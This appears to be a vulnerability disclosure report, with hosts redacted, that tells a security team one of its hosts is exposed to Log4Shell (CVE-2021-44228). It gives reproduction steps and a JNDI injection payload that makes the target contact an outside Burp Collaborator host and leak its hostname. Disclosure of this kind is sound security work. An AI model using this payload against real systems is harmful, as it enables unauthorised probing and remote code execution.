LOGJ4 VUlnerability [HtUS]

**Description:** Hi team, log4 shell is recent 0-day exploit it's Java package vulnerable. █████ is vulnerable **Impact** RCE **System Host(s)** ██████ **Affected Product(s) and Version(s)** **CVE Numbers** CVE-2021-44228 **Steps to Reproduce** 1. Go to this url => https://█████/?x=${jndi:ldap://${hostName}.uri.xxxxx.burpcollaborator.net/a} 2. paste the poc code on parameter 3. Then burp collaborator received reverse ping back Photos below **POC CODE** ${jndi:ldap://${hostName}.uri.xxxxx.burpcollaborator.net/a} **Suggested Mitigation/Remediation Actions** https://www.lunasec.io/docs/blog/log4j-zero-day/ ## Impact Successful attack leads Arbitary Code Execution on the application